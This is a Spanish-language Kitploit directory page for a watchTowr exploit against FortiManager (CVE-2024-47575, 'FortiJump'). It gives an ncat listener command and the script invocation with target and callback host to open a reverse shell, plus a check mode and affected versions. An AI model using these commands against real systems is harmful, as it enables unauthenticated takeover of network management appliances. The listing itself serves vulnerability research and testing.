Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Fortijump-Exploit-CVE-2024-47575 — Fortinet Fortimanager Ejecución Remota de Código sin Autenticación AKA FortiJump CVE-2024-47575 | Kitploit
Herramientas/GitHubGitHub/watchtowrlabs/fortijump-exploit-cve-2024-47575
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubwatchtowrlabs/fortijump-exploit-cve-2024-47575

Fortijump-Exploit-CVE-2024-47575

Fortinet Fortimanager Ejecución Remota de Código sin Autenticación AKA FortiJump CVE-2024-47575

Ver Repositorio
97305hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-47575

Fortinet FortiManager Ejecución Remota de Código no Autenticada, también conocido como FortiJump CVE-2024-47575

Consulte nuestra entrada de blog para detalles técnicos

Para empezar, establezca su sesión ncat:

root@kitploit:~
nc -lvvnp 80

Luego, ejecute nuestro generador de artefactos de detección:

root@kitploit:~
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

Para comprobar la vulnerabilidad únicamente, use las siguientes opciones:

root@kitploit:~
python3 CVE-2024-47575.py --target 192.168.1.110 --action check

Versiones Afectadas

root@kitploit:~
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

Autores del exploit

Este exploit fue escrito por Sina Kheirkhah (@SinSinology) de watchTowr (@watchtowrcyber)

Siga a watchTowr Labs

Para las últimas investigaciones de seguridad, siga al equipo de watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Descargar herramienta